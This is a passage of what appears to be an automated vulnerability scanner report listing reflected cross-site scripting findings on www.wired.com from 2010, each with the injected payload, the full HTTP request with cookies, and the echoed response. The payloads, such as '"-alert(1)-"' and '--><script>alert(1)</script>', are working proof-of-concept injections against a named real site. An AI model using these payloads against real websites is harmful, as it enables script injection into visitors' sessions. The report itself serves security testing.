This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001a470f"><a>013bdc7dab4 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 01:00:32 GMT Date: Mon, 22 Nov 2010 00:55:32 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106805
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_making-the-soundtrack-harry-potter-and-the-deathly-hallows c_653378922001a470f"><a>013bdc7dab4"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload c4ed8--><script>alert(1)</script>c2cb6fe8a5f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /videoc4ed8--><script>alert(1)</script>c2cb6fe8a5f/october-madness-meets-sharktoberfest/637752381001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29461 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 01:00:40 GMT Date: Mon, 22 Nov 2010 00:55:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /videoc4ed8--><script>alert(1)</script>c2cb6fe8a5f/october-madness-meets-sharktoberfest/637752381001 --> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 171bb"><a>78f80f90327 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video171bb"><a>78f80f90327/october-madness-meets-sharktoberfest/637752381001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29428 Vary: Accept-Encoding Cache-Control: max-age=276 Expires: Mon, 22 Nov 2010 00:58:58 GMT Date: Mon, 22 Nov 2010 00:54:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video171bb"><a>78f80f90327 ss_october-madness-meets-sharktoberfest c_637752381001"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96a4f"-alert(1)-"ca9eb5635ad was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/october-madness-meets-sharktoberfest96a4f"-alert(1)-"ca9eb5635ad/637752381001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 01:01:32 GMT Date: Mon, 22 Nov 2010 00:56:32 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106782
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29995"><a>a6225359441 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/october-madness-meets-sharktoberfest29995"><a>a6225359441/637752381001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 01:00:44 GMT Date: Mon, 22 Nov 2010 00:55:44 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106743
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_october-madness-meets-sharktoberfest29995"><a>a6225359441 c_637752381001"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 784d0"-alert(1)-"229d6c67458 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/october-madness-meets-sharktoberfest/637752381001784d0"-alert(1)-"229d6c67458 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=293 Expires: Mon, 22 Nov 2010 01:02:10 GMT Date: Mon, 22 Nov 2010 00:57:17 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106775
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81e38"><a>f59f5b69106 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/october-madness-meets-sharktoberfest/63775238100181e38"><a>f59f5b69106 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=281 Expires: Mon, 22 Nov 2010 01:01:15 GMT Date: Mon, 22 Nov 2010 00:56:34 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106768
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_october-madness-meets-sharktoberfest c_63775238100181e38"><a>f59f5b69106"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96636"><a>8f845e926ab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video96636"><a>8f845e926ab/reddit HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29340 Vary: Accept-Encoding Cache-Control: max-age=289 Expires: Mon, 22 Nov 2010 00:54:17 GMT Date: Mon, 22 Nov 2010 00:49:28 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video96636"><a>8f845e926ab ss_reddit"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3f93"><a>681f894aa14 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/redditc3f93"><a>681f894aa14 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=272 Expires: Mon, 22 Nov 2010 00:55:50 GMT Date: Mon, 22 Nov 2010 00:51:18 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106668
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_redditc3f93"><a>681f894aa14"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b91b2"-alert(1)-"3d3cbc63103 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/redditb91b2"-alert(1)-"3d3cbc63103 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:57:27 GMT Date: Mon, 22 Nov 2010 00:52:27 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106685
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 597a6"><a>6c7de32e4a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video597a6"><a>6c7de32e4a/science HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29272 Vary: Accept-Encoding Cache-Control: max-age=294 Expires: Mon, 22 Nov 2010 00:55:43 GMT Date: Mon, 22 Nov 2010 00:50:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video597a6"><a>6c7de32e4a ss_science"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc810"-alert(1)-"430ff756626 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/sciencefc810"-alert(1)-"430ff756626 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=282 Expires: Mon, 22 Nov 2010 00:58:12 GMT Date: Mon, 22 Nov 2010 00:53:30 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106669
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9dbc6"><a>d4e24611f94 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/science9dbc6"><a>d4e24611f94 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:57:28 GMT Date: Mon, 22 Nov 2010 00:52:28 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106680
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_science9dbc6"><a>d4e24611f94"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25a9b"><a>b1b48537299 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video25a9b"><a>b1b48537299/search/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29341 Vary: Accept-Encoding Cache-Control: max-age=278 Expires: Mon, 22 Nov 2010 00:50:55 GMT Date: Mon, 22 Nov 2010 00:46:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video25a9b"><a>b1b48537299 ss_search"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cba52"><a>8549dae7a51 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/searchcba52"><a>8549dae7a51/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=276 Expires: Mon, 22 Nov 2010 00:52:49 GMT Date: Mon, 22 Nov 2010 00:48:13 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106678
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_searchcba52"><a>8549dae7a51"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7ddb"-alert(1)-"24d4282cfc2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/searchc7ddb"-alert(1)-"24d4282cfc2/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=294 Expires: Mon, 22 Nov 2010 00:53:57 GMT Date: Mon, 22 Nov 2010 00:49:03 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106685
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87341"><a>5e3fd03ab6b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video87341"><a>5e3fd03ab6b/security HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29344 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:54:54 GMT Date: Mon, 22 Nov 2010 00:49:54 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video87341"><a>5e3fd03ab6b ss_security"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b027"><a>b24f73bee4d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
